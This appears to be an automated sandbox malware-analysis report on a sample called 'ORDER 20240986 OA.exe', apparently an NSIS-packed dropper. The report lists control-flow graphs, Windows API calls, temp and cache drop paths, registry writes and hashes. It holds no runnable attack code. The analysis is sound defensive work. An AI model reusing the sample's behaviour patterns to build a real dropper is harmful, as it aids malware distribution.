                                                                                                                                                  • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                                                                                                  • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                                                                                                  • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 982 4057ce-405819 CreateDirectoryW 983 40581b-40581d 982->983 984 40581f-40582c GetLastError 982->984 985 405846-405848 983->985 984->985 986 40582e-405842 SetFileSecurityW 984->986 986->983 987 405844 GetLastError 986->987 987->985
                                                                                                                                                  APIs
                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405825
                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405844
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                                  • API String ID: 3449924974-224404859
                                                                                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                  • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                  • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 988 405dbc-405dc8 989 405dc9-405dfd GetTickCount GetTempFileNameW 988->989 990 405e0c-405e0e 989->990 991 405dff-405e01 989->991 993 405e06-405e09 990->993 991->989 992 405e03 991->992 992->993
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6), ref: 00405DF5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\ORDER 20240986 OA.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                  • API String ID: 1716503409-3740495243
                                                                                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                  • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                  • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 994 6fbb177b-6fbb17ba call 6fbb1b63 998 6fbb18da-6fbb18dc 994->998 999 6fbb17c0-6fbb17c4 994->999 1000 6fbb17cd-6fbb17da call 6fbb2398 999->1000 1001 6fbb17c6-6fbb17cc call 6fbb2356 999->1001 1006 6fbb180a-6fbb1811 1000->1006 1007 6fbb17dc-6fbb17e1 1000->1007 1001->1000 1008 6fbb1813-6fbb182f call 6fbb256d call 6fbb15b4 call 6fbb1272 GlobalFree 1006->1008 1009 6fbb1831-6fbb1835 1006->1009 1010 6fbb17fc-6fbb17ff 1007->1010 1011 6fbb17e3-6fbb17e4 1007->1011 1034 6fbb1889-6fbb188d 1008->1034 1012 6fbb1882-6fbb1888 call 6fbb256d 1009->1012 1013 6fbb1837-6fbb1880 call 6fbb15c6 call 6fbb256d 1009->1013 1010->1006 1014 6fbb1801-6fbb1802 call 6fbb2d2f 1010->1014 1016 6fbb17ec-6fbb17ed call 6fbb2a74 1011->1016 1017 6fbb17e6-6fbb17e7 1011->1017 1012->1034 1013->1034 1027 6fbb1807 1014->1027 1030 6fbb17f2 1016->1030 1022 6fbb17e9-6fbb17ea 1017->1022 1023 6fbb17f4-6fbb17fa call 6fbb2728 1017->1023 1022->1006 1022->1016 1033 6fbb1809 1023->1033 1027->1033 1030->1027 1033->1006 1037 6fbb18ca-6fbb18d1 1034->1037 1038 6fbb188f-6fbb189d call 6fbb2530 1034->1038 1037->998 1040 6fbb18d3-6fbb18d4 GlobalFree 1037->1040 1044 6fbb189f-6fbb18a2 1038->1044 1045 6fbb18b5-6fbb18bc 1038->1045 1040->998 1044->1045 1047 6fbb18a4-6fbb18ac 1044->1047 1045->1037 1046 6fbb18be-6fbb18c9 call 6fbb153d 1045->1046 1046->1037 1047->1045 1049 6fbb18ae-6fbb18af FreeLibrary 1047->1049 1049->1045
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6FBB1B63: GlobalFree.KERNEL32(?), ref: 6FBB1DB6
                                                                                                                                                    • Part of subcall function 6FBB1B63: GlobalFree.KERNEL32(?), ref: 6FBB1DBB
                                                                                                                                                    • Part of subcall function 6FBB1B63: GlobalFree.KERNEL32(?), ref: 6FBB1DC0
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB1829
                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6FBB18AF
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB18D4
                                                                                                                                                    • Part of subcall function 6FBB2356: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBB2387
                                                                                                                                                    • Part of subcall function 6FBB2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBB17FA,00000000), ref: 6FBB27F8
                                                                                                                                                    • Part of subcall function 6FBB15C6: lstrcpyW.KERNEL32(?,6FBB4020,00000000,6FBB15C3,?,00000000,6FBB1753,00000000), ref: 6FBB15DC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                                                                  • Opcode ID: 2a1e4f610b712ee343c9f2580d3403a480ecd038e982c8afaed9cc9eb3440383
                                                                                                                                                  • Instruction ID: d241a98a7aded1d1c9ee36f2abbc30b23d870b838e776b2a6f6efd8497280f10
                                                                                                                                                  • Opcode Fuzzy Hash: 2a1e4f610b712ee343c9f2580d3403a480ecd038e982c8afaed9cc9eb3440383
                                                                                                                                                  • Instruction Fuzzy Hash: D941AEB14043C49ADB019F34BC84BFA37A8FF06314F48456EE91A9A0C6DFB8E185CB60

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1051 4023e4-402415 call 402c41 * 2 call 402cd1 1058 402ac5-402ad4 1051->1058 1059 40241b-402425 1051->1059 1060 402427-402434 call 402c41 lstrlenW 1059->1060 1061 402438-40243b 1059->1061 1060->1061 1065 40243d-40244e call 402c1f 1061->1065 1066 40244f-402452 1061->1066 1065->1066 1069 402463-402477 RegSetValueExW 1066->1069 1070 402454-40245e call 403116 1066->1070 1073 402479 1069->1073 1074 40247c-40255d RegCloseKey 1069->1074 1070->1069 1073->1074 1074->1058 1076 40288b-402892 1074->1076 1076->1058
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx1318.tmp
                                                                                                                                                  • API String ID: 2655323295-2645957968
                                                                                                                                                  • Opcode ID: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                                  • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                                                                                                  • Opcode Fuzzy Hash: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                                                                                                  • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,?,74DF3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C25
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                    • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi, xrefs: 00401640
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi
                                                                                                                                                  • API String ID: 1892508949-3393217848
                                                                                                                                                  • Opcode ID: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                                                                                                  • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                                                                                                  • Opcode Fuzzy Hash: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                                                                                                  • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                                                                                    • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                  • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                                  • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                                                                                  • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                                  • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                                                                                    • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,74DF23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                                    • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,74DF23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                                    • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,74DF23A0), ref: 0040535A
                                                                                                                                                    • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                    • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                                  • Opcode ID: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                                                                                                  • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                                                                                                  • Opcode Fuzzy Hash: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                                                                                                  • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
